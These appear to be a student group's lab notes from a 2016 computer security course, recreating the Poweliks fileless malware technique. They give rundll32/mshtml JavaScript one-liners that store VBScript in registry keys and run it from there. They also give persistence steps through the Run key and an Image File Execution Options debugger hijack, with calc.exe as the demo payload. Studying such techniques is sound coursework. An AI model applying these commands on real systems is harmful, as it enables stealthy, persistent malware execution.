CSC427: Computer Security, Winter 2016

Poweliks

Group: Dmitriy & James

Main Commands:

Set WshShell = CreateObject("WScript.Shell")
Set oExec = WshShell.Exec("calc.exe")

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";wsh=new%20ActiveXObject("WScript.Shell");wstr1=wsh.regread("HKEY_CURRENT_USER\\Software\\poweliks_reg1");wstr2=wsh.regread("HKEY_CURRENT_USER\\Software\\poweliks_reg2");document.write("")

Steps

//-----Get Familiar with environment
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";alert("foo");

//-----Run calculator using WScript.Shell Run from environment 
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";MyObject=new%20ActiveXObject("WScript.Shell");MyObject.Run("calc.exe");

//-----This can be runnable .vbs file that launches calculator
Set WshShell = CreateObject("WScript.Shell")
Set oExec = WshShell.Exec("calc.exe")

//-----Run internals of .vbs file within environment
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write("")

//-----Write .vbs internals into registry keys
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";MyObject=new%20ActiveXObject("WScript.Shell");MyObject.regwrite("HKEY_CURRENT_USER\\SOFTWARE\\poweliks_reg1","Set WshShell = CreateObject(\"WScript.Shell\")");
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";MyObject=new%20ActiveXObject("WScript.Shell");MyObject.regwrite("HKEY_CURRENT_USER\\SOFTWARE\\poweliks_reg2","Set oExec = WshShell.Exec(\"calc.exe\")");

//-----Check keys by reading them using wscript and alert through javascript within environment
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";MyObject=new%20ActiveXObject("WScript.Shell");alert(MyObject.regread("HKEY_CURRENT_USER\\SOFTWARE\\poweliks_reg1"));
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";MyObject=new%20ActiveXObject("WScript.Shell");alert(MyObject.regread("HKEY_CURRENT_USER\\SOFTWARE\\poweliks_reg2"));

//-----Final version read both registry keys into mshtml document as executable .vbs without using .vbs file
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";wsh=new%20ActiveXObject("WScript.Shell");wstr1=wsh.regread("HKEY_CURRENT_USER\\Software\\poweliks_reg1");wstr2=wsh.regread("HKEY_CURRENT_USER\\Software\\poweliks_reg2");document.write("")

Basic Injection into Registry Startup

//-----Write the final version of the string (above) into registry key and restart 
HKEY_CURRENT_USER\\software\\microsoft\\windows\\currentversion\\run\\

Advanced Injection into Registry Startup

//-----Navigate to:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\currentversion\image file execution options\\

//-----Create a new key
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\currentversion\image file execution options\\calc.exe

//-----Add a new string "debugger" with the value being the final version of the string above
debugger -> "rundll.exe ..."

//----Save and try to launch calc.exe
OMG!

Resources:

Official Course Website: Arnold's 427 Page